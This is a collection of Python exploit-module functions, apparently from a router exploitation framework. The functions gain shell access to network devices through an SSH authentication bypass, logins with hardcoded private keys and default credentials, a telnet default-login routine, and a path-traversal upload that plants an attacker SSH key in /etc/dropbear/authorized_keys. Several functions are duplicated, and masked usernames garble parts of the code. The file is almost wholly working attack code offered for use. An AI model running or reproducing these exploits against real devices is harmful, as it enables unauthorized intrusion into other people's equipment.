def run(self): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(self.target, username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass except: print_error("Exploit Failed - SSH Service is down") return trans = client.get_transport() try: trans.auth_password(username='******', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass except: print_status("Error with Existing Session. Wait few minutes.") return try: trans.auth_interactive(username='******', handler=self.custom_handler) print_success("Exploit succeeded") ssh_interactive(client) except: print_error("Exploit failed") return
def run(self): if self.check(): if "DSA PRIVATE KEY" in self.valid['private_key']: pkey = paramiko.DSSKey.from_private_key( StringIO.StringIO(self.valid['private_key'])) elif "RSA PRIVATE KEY" in self.valid['private_key']: pkey = paramiko.RSAKey.from_private_key( StringIO.StringIO(self.valid['private_key'])) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, 22, timeout=5, username=self.valid['user'], pkey=pkey) except: ssh.close() print_error("Device seems to be not vulnerable") else: print_success("SSH - Successful authentication") ssh_interactive(ssh) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success('Target is vulnerable') print_success('Trying to exploit by uploading SSH public key') key = paramiko.RSAKey.generate(1024) public_key = key.get_base64() private_key = StringIO.StringIO() key.write_private_key(private_key) tmp_file_pubkey = tempfile.TemporaryFile() tmp_file_pubkey.write('ssh-rsa ' + public_key) tmp_file_pubkey.seek(0) upload_params = { 'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, { 'Expect': '' }) } upload_url = '{0}:{1}/login.cgi'.format(self.target, self.port) response = http_request(url=upload_url, method='POST', files=upload_params) if response is None: print_error( 'Something was wrong while uploading the SSH Public Key') return print_success('Appareantly the exploit worked fine') print_success('Trying to invoke a interactive SSH Shell') client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) pseudo_privkey_file = StringIO.StringIO(private_key.getvalue()) pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file) pseudo_privkey_file.close() private_key.close() ip_target = self.target.replace('https://', '') ip_target = ip_target.replace('http://', '') ip_target = ip_target.replace('/', '') client.connect(ip_target, self.ssh_port, username='******', pkey=pkey) ssh_interactive(client) else: print_error('Target is not vulnerable')
def run(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password) except (paramiko.ssh_exception.SSHException, socket.error): print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password)) return else: print_success("SSH - Successful authentication") ssh_interactive(ssh)
def init_ssh_session(self, username, password): print_status("Trying to authenticate through SSH with username: {} password:{} account".format(username, password)) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) target = self.target.replace("http://", "").replace("https://", "") try: ssh.connect(target, 22, timeout=5, username=username, password=password) except: ssh.close() else: print_success("SSH - Successful authentication") ssh_interactive(ssh) return
def run(self): if self.check(): print_success('Target is vulnerable') print_success('Trying to exploit by uploading SSH public key') key = paramiko.RSAKey.generate(1024) public_key = key.get_base64() private_key = StringIO.StringIO() key.write_private_key(private_key) tmp_file_pubkey = tempfile.TemporaryFile() tmp_file_pubkey.write('ssh-rsa ' + public_key) tmp_file_pubkey.seek(0) upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})} upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port) response = http_request(url=upload_url, method='POST', files=upload_params) if response is None: print_error('Something was wrong while uploading the SSH Public Key') return print_success('Appareantly the exploit worked fine') print_success('Trying to invoke a interactive SSH Shell') client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) pseudo_privkey_file = StringIO.StringIO(private_key.getvalue()) pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file) pseudo_privkey_file.close() private_key.close() ip_target = self.target.replace('https://', '') ip_target = ip_target.replace('http://', '') ip_target = ip_target.replace('/', '') client.connect(ip_target, self.ssh_port, username='******', pkey=pkey) ssh_interactive(client) else: print_error('Target is not vulnerable')
def run(self): if self.check(): if "DSA PRIVATE KEY" in self.valid['private_key']: pkey = paramiko.DSSKey.from_private_key(StringIO.StringIO(self.valid['private_key'])) elif "RSA PRIVATE KEY" in self.valid['private_key']: pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(self.valid['private_key'])) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, 22, timeout=5, username=self.valid['user'], pkey=pkey) except: ssh.close() print_error("Device seems to be not vulnerable") else: print_success("SSH - Successful authentication") ssh_interactive(ssh) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password) except Exception: ssh.close() else: print_success("SSH - Successful authentication") ssh_interactive(ssh) return try: tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) tn.write("\r\n") tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(self.password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Failed", "failed"], 5) if i != -1: return False else: if any(map(lambda x: x in res, ["#", "$", ">"])): print_success("Telnet - Successful authentication") tn.write("\r\n") tn.interact() tn.close() except Exception: print_error("Connection Error") return